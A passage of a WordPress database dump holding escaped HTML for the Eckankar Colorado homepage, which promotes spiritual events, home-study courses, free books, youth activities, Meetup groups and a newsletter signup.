height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(231564,39185,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 